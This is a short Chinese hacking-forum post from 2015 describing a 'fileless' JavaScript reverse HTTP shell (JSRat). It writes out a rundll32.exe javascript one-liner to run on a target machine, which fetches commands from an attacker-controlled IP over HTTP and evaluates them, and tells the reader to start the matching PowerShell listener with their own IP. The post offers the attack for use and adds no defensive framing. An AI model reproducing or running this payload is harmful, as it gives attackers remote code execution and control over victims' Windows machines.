搜索
查看: 412|回复: 0

无文件js反弹http shell

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2015-12-31 11:42:43 | 显示全部楼层 |阅读模式
代码都在这里:
https://gist.github.com/subTee/f1603fa5c15d5f8825c0

目标机器上执行:
  1. rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://反弹的IP/connect",false);h.Send();B=h.ResponseText;eval(B)
复制代码
本地执行POWERSHELL脚本
PS E:\> .\JSRat.ps1
注意修改PS里对应的$Server = '本地监听的IP' #Listening IP. Change This.

执行效果如下
[url=http://static.wooyun.org/upload/image/201512/2015123109535887414.png][/url]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表